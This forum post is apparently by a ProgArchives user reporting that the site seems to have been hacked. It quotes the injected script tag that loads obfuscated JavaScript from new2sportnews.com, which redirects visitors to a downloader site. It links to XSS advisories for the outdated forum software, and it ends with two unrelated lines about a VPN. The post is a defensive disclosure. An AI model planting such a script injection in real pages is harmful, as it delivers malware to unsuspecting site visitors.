Download denied

Apparently PA uses Web Wiz Forums software, version 11.01 (released 10 Sep 2014). The latest version is 12.05 (released 18 Jan 2022). I did a search for Web Wiz vulnerabilities, and found that many versions, beginning with v6.34 and extending thru v10.03, were identified as having vulnerability to cross-site scripting (XSS) attacks. That's a lot of versions for which they never fixed the problem, and it still might be present in v11.01.

https://www.cvedetails.com/cve/CVE-2006-0175/

https://www.exploit-db.com/exploits/28589

https://vulmon.com/searchpage?q=web+wiz+forum

https://www.nmmapper.com/st/exploitdetails/37678/36689/web-wiz-forums-multiple-cross-site-scripting-vulnerabilitiesdownload/

It seems that many users, myself included, have had similar issues. I've spent considerable time digging into the source of the problem. The upshot is that ProgArchives appears to have been hacked!

Back in August, I began getting warnings from Norton Antivirus about a malicious activity (i.e. intrusion detections) when I visit the "Forums", or "Prog Rock Guides" pages. But it doesn't happen on the "About Us" page, or the main page.

The problem is that the HTML code for the Forums and Guides pages (and probably others) contains malicious javascript that looks like this:

    <script src="https://new2sportnews.com/progarchives.js" type="d597b4f971c3864a4c6a613f-text/javascript"></script>

The referenced site, new2sportnews.com, has the appearance of the Nigerian version of The Guardian website. However, it is a bogus web site. It was created in Jan 2021 and had no content until Jun 2022, and the content (according to the internet's Wayback Machine) has not changed since then.

The javascript that is stored at that site (i.e. https://new2sportnews.com/progarchives.js) and is being executed unconditionally by Progarchives, is highly obfuscated to hide its function. I ran it through an "unobfuscator" and confirmed that the script redirects the user to a site called "advertising-cdn.com" which attempts to download a file to the user's computer. The nature of the file is unknown. It could be password stealing, keystroke interception, or other nefarious functions.

I also checked Progarchives using the Wayback Machine and determined that it was clean as of July 19th. Sometime after that is when the system was hacked. Users, myself included, began experiencing problems around Aug 7th.

After an update to my Norton Antivirus, it started completely blocking my access to the forums because I couldn't stop it from executing the malicious javascript. I could disable javascript entirely, but then I could not post or vote in polls. My solution was to install the NoScript add-on to Firefox, and disable scripts specifically for new2sportnews.com. That seems to have worked, as least for now.

The target site, advertising-cdn.com, which contains the dowloader script appeared to be a valid site at first, but now it is gone. The hackers could be working on a different attack.

I've contacted PA admins through every means possible. Thanks to Ian (aka Nogbad the Bad) for forwarding private messages that I sent him on Progressive ears. I also contacted the site owners/admins thru GoDaddy, but so far no one has responded.

I hope that our site admins fix this infection before its users are seriously attacked. There is no valid reason that the HTML code for this site should be executing a javascript on a bogus website!

To check for yourself, look at the page source HTML (in Firefox right-click anywhere on a page and select "View Page Source"), then search for new2sportnews.com. If you find it, you've confirmed that the site has been hacked and can potentially cause serious harm to its users (if it hasn't already).

VPN server in Sydney –> "Download denied" notification.

So, it appears that the problem is with the VPN.